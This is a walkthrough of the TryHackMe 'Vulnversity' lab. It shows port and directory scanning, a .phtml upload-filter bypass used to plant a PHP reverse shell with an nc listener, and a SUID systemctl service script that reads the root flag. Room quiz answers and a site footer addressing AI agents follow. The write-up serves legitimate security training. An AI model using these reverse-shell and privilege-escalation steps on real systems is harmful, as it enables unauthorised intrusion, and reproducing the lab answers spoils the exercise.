# TryHackMe - Vulnversity * [Room](https://tryhackme.com/room/vulnversity) ## Nmap ``` ┌──(root💀kali)-[~] └─# nmap -T5 -sC -sV -O -Pn -p- 10.10.72.158 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 14:04 EDT Warning: 10.10.72.158 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.72.158 Host is up (0.22s latency). Not shown: 65508 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA) | 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA) |_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1281/tcp filtered healthd 3128/tcp open http-proxy Squid http proxy 3.5.12 |_http-server-header: squid/3.5.12 |_http-title: ERROR: The requested URL could not be retrieved 3333/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Vuln University |_http-server-header: Apache/2.4.18 (Ubuntu) [STRIPPED] Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Linux 3.10 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: vulnuniversity | NetBIOS computer name: VULNUNIVERSITY\x00 | Domain name: \x00 | FQDN: vulnuniversity |_ System time: 2022-05-08T14:16:34-04:00 | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb2-time: | date: 2022-05-08T18:16:34 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: , NetBIOS MAC: (unknown) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 710.19 seconds ``` ## Initial foothold If we go to we have a website. However the content is not really useful for us. We can run gobuster, that is how we find the folder internal ``` ┌──(root💀kali)-[~/Documents/tryhackme/vulnversity] └─# gobuster dir -u http://10.10.72.158:3333/ --wildcard -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.72.158:3333/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/05/08 14:17:29 Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 320] [--> http://10.10.72.158:3333/images/] /css (Status: 301) [Size: 317] [--> http://10.10.72.158:3333/css/] /js (Status: 301) [Size: 316] [--> http://10.10.72.158:3333/js/] /fonts (Status: 301) [Size: 319] [--> http://10.10.72.158:3333/fonts/] /internal (Status: 301) [Size: 322] [--> http://10.10.72.158:3333/internal/] ``` * This a page with a file upload fonctionnality. This is perfect for a reverse shell\ ![image](https://user-images.githubusercontent.com/96747355/167309849-79c67895-2633-4426-897a-7d7ad3aa1f5a.png) * After a few tries with burp, the accepted exentions is phtml. You can also fuzz it with burp intruder and make a grep match on "extension not allowed" to see which one will be allowed. * We edit php revershell (on kali we have it preinstalled) `cp /usr/share/webshells/php/php-reverse-shell.php .` we rename it in the accepted extension `mv php-reverse-shell.php php-reverse-shell.phtml` * `nc -lvp 4444` We set up our listener * Now as mentioned we just need to go to `http://:3333/internal/uploads/php-reverse-shell.phtml` to execute our shell (if this was not specified we could have run gobuster in the internal folder * We get a shell as `www-data` ## Privesc * Now let's enumerate our ways to privesc * `find / -perm -u=s -type f 2>/dev/null` We have a few files with suid bit on ``` /usr/bin/newuidmap /usr/bin/chfn /usr/bin/newgidmap /usr/bin/sudo /usr/bin/chsh /usr/bin/passwd /usr/bin/pkexec /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/at /usr/lib/snapd/snap-confine /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/squid/pinger /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /bin/su /bin/ntfs-3g /bin/mount /bin/ping6 /bin/umount /bin/systemctl /bin/ping /bin/fusermount /sbin/mount.cifs ``` * We have a GTFOBins entry for `/bin/systemctl` [here](https://gtfobins.github.io/gtfobins/systemctl/#suid) * Let's try the exploitation * It creates a service in an env * It will create a temp file in the syst as a service * This will execute a command with bin/sh (in GTFObins it will execute id) in our case we could try to output our root flag in the output folder. It will then set a link and enable it * Here is our modified script ``` TF=$(mktemp).service echo '[Service] ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output" [Install] WantedBy=multi-user.target' > $TF /bin/systemctl link $TF /bin/systemctl enable --now $TF ``` * Once we pasted all our commands above we just need to `cat /tmp/output` and this will give us the root flag. ## Questions ### Task 2 * `Scan the box, how many ports are open?` Answer `6` * `What version of the squid proxy is running on the machine?`Answer `3.5.12` * `How many ports will nmap scan if the flag -p-400 was used?` Answer `400` * `Using the nmap flag -n what will it not resolve?` Answer `DNS` * `What is the most likely operating system this machine is running?` Answer `Ubuntu` * `What port is the web server running on?` Answer `3333` ### Task 3 * `What is the directory that has an upload form page?` Answer `/internal/` #### Task 4 * `Run this attack, what extension is allowed?` Answer `phtml` * `What is the name of the user who manages the webserver?` Answer `bill` * `What is the user flag?` I will let you do this on your own Hint: `cat /home/bill/user.txt` #### Task 5 * `On the system, search for all SUID files. What file stands out?` Answer `/bin/systemctl` * `Become root and get the last flag (/root/root.txt)` I will let you do this on your own Hint: `cat /root/root.txt` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://csbygb.gitbook.io/pentips/writeups/thmwriteups/thm-vulnversity.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.